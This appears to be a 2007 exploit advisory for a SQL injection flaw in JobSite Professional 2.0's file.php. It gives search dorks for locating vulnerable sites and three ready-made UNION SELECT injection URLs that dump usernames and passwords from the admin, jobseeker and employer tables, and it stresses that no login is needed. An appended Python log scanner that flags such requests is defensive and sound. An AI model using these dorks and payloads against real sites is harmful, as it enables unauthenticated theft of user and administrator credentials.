JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability

2007-10-28 00:00:00

#########################################################################
JobSite Professional v2.0 Remote SQL Injection Vulnerability
#########################################################################


## AUTHOR : ZynbER
## HOME : NoWhere


## Script WebSite:
http://www.jobsiteprofessional.com

## Dork english version : inurl:index.php?page=en_jobseekers
## Dork french version : inurl:index.php?page=fr_Candidats


## EXPLOITS :

The id parameter of file.php (file.php?id=) is vulnerable to SQL injection:



http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_jobseekers/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_employers/*



## Note
No registration is needed; the injection is reachable without logging in.
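
A defender-side check for the requests listed above, added here as an example and not part of the original advisory: it scans web-server access logs for file.php requests whose id value is not a plain decimal number. The combined log format, the digits-only rule for a legitimate id, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry: "METHOD target HTTP/x"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate id is a short run of decimal digits.
VALID_ID = re.compile(r"\d{1,10}")
# Tokens seen in the advisory's requests, used only to label a finding.
SQL_HINT = re.compile(r"\b(union|select|from|concat|char)\b|/\*|--", re.I)


def check_request(target):
    """Return a list of (id_value, reason) findings for one request target."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/file.php"):
        return []
    # parse_qs percent-decodes and maps '+' to space, normalising encoded variants.
    values = parse_qs(parts.query, keep_blank_values=True).get("id", [])
    findings = []
    for value in values:
        if VALID_ID.fullmatch(value):
            continue
        reason = "sql-keywords" if SQL_HINT.search(value) else "non-numeric-id"
        findings.append((value, reason))
    return findings


def scan(lines):
    """Yield (client_ip, id_value, reason) for every suspicious log line."""
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client = line.split(" ", 1)[0]
        for value, reason in check_request(match.group(1)):
            yield client, value, reason


# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Oct/2007:10:00:01 +0000] "GET /file.php?id=17 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/Oct/2007:10:00:07 +0000] "GET /file.php?id=-1+UNION+SELECT+1,2,3/* HTTP/1.1" 200 812',
    '192.0.2.44 - - [28/Oct/2007:10:00:09 +0000] "GET /File.php?id=-1%20union%20select%201 HTTP/1.1" 200 790',
    '192.0.2.51 - - [28/Oct/2007:10:00:12 +0000] "GET /file.php?id=abc HTTP/1.1" 200 300',
    '192.0.2.10 - - [28/Oct/2007:10:00:15 +0000] "GET /index.php?page=en_jobseekers HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Because no login is required, every flagged request should be treated as coming from an anonymous client; the same digits-only rule is what file.php itself should enforce on id before the value reaches a query.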



## GREETZ : MEKNES - SIDIBABA - MARROK - SKIZO - BouKa-BouKa


Fixes

No fixes
